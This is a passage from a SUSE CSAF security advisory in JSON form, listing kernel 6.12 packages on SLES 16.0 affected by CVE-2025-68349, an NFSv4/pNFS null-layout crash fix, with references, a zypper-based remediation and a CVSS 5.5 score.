"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68348"
},
{
"cve": "CVE-2025-68349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68349"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid\n\nFixes a crash when layout is null during this call stack:\n\nwrite_inode\n -\u003e nfs4_write_inode\n -\u003e pnfs_layoutcommit_inode\n\npnfs_set_layoutcommit relies on the lseg refcount to keep the layout\naround. Need to clear NFS_INO_LAYOUTCOMMIT otherwise we might attempt\nto reference a null layout.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68349",
"url": "https://www.suse.com/security/cve/CVE-2025-68349"
},
{
"category": "external",
"summary": "SUSE Bug 1255544 for CVE-2025-68349",
"url": "https://bugzilla.suse.com/1255544"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
